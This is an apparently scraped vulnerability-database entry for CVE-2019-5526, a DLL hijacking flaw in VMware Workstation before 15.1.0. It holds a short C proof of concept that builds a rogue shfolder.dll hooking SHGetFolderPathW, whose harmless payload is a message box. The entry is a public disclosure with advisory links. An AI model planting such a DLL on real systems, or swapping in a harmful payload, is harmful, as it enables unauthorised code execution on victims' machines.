Lucene search
K

VMware Workstation 15.1.0 - DLL Hijacking

🗓️ 16 May 2019 00:00:00Reported by Miguel Mendez Z. & Claudio Cortes C.Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 162 Views

VMware Workstation DLL hijacking < 15.1.0 fix availabl

Related
Code
ReporterTitlePublishedViews
Family
0day.today
VMware Workstation 15.1.0 - DLL Hijacking Exploit
16 May 201900:00
zdt
Circl
CVE-2019-5526
16 May 201900:00
circl
CVE
CVE-2019-5526
15 May 201915:18
cve
Cvelist
CVE-2019-5526
15 May 201915:18
cvelist
EUVD
EUVD-2019-15101
3 Oct 202520:07
euvd
exploitpack
VMware Workstation 15.1.0 - DLL Hijacking
16 May 201900:00
exploitpack
Kaspersky
KLA12116 PE vulnerability in VMware Workstation and Player
14 May 201900:00
kaspersky
NVD
CVE-2019-5526
15 May 201916:29
nvd
Packet Storm
VMware Workstation DLL Hijacking
16 May 201900:00
packetstorm
Prion
Design/Logic Flaw
15 May 201916:29
prion
Rows per page
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------


Description:

VMware Workstation contains a DLL hijacking issue because some DLL.


DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------
#include "dll.h"
#include <windows.h>

DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}

--------------------------


https://www.vmware.com/security/advisories/VMSA-2019-0007.html

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 May 2019 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 37.8
CVSS 29.3
EPSS0.0683
162